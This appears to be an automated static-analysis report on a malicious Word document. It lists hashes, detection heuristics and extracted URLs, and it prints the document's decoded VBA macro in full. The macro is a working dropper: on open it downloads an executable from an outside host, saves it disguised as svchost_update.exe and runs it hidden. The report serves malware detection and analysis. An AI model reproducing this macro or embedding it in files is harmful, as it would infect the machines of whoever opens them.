Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 d63bde36d5c4ae53…

MALICIOUS

Office (OLE) / .DOC

61.5 KB Created: 2026-03-24 11:27:00 Authoring application: Microsoft Office Word First seen: 2026-06-13
MD5: efec0d3bc69c8c5dc1d8d20074c85bcc SHA-1: 236b7492165cd63ae915c9fbe3c733ef294aaf18 SHA-256: d63bde36d5c4ae535822f3c321afad9c4cac4f2b11fca83cb30f2e18470c38f1
338 Risk Score

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGER
    Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            Shell strFilePath, vbHide
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            objADOStream.Write objHTTP.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        strFilePath = Environ("TEMP") & "\svchost_update.exe"
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
    • http://schemas.microsoft.com/office/2006/metadata/contentTypeReferenced by macro
    • http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributesReferenced by macro
    • http://schemas.microsoft.com/office/2006/metadata/propertiesReferenced by macro
    • http://www.w3.org/2001/XMLSchemaReferenced by macro
    • http://schemas.microsoft.com/office/2006/documentManagement/typesReferenced by macro
    • http://schemas.microsoft.com/office/infopath/2007/PartnerControlsReferenced by macro
    • http://schemas.openxmlformats.org/package/2006/metadata/core-propertiesReferenced by macro
    • http://www.w3.org/2001/XMLSchema-instanceReferenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro
    • http://purl.org/dc/terms/Referenced by macro
    • http://schemas.microsoft.com/internal/obdReferenced by macro
    • http://dublincore.org/schemas/xmls/qdc/2003/04/02/dc.xsdReferenced by macro
    • http://dublincore.org/schemas/xmls/qdc/2003/04/02/dcterms.xsdReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro
    • http://schemas.microsoft.com/sharepoint/v3/contenttype/formsReferenced by macro
    • http://lab1stefant123.germanywestcentral.cloudapp.azure.com:8000/place.exeReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1374 bytes
SHA-256: 70a059517d2eb19dae34b8468f9a11b61b5c64ed1b9a551edf015bba0e7c7c70
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    On Error Resume Next
    
    Dim strUrl As String
    Dim strFilePath As String
    
    strUrl = "http://lab1stefant123.germanywestcentral.cloudapp.azure.com:8000/place.exe"
    strFilePath = Environ("TEMP") & "\svchost_update.exe"

    Dim objHTTP As Object
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
    
    objHTTP.Option(4) = 13056
    
    objHTTP.Open "GET", strUrl, False
    
    objHTTP.Send

    If Err.Number <> 0 Then
        Err.Clear
        Set objHTTP = Nothing
        Exit Sub
    End If

    If objHTTP.Status = 200 Then
        Dim objADOStream As Object
        Set objADOStream = CreateObject("ADODB.Stream")
        objADOStream.Open
        objADOStream.Type = 1 ' adTypeBinary
        objADOStream.Write objHTTP.ResponseBody
        objADOStream.Position = 0
        objADOStream.SaveToFile strFilePath, 2 ' adSaveCreateOverWrite
        objADOStream.Close
        
        Shell strFilePath, vbHide
    End If
    
    Set objADOStream = Nothing
    Set objHTTP = Nothing
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.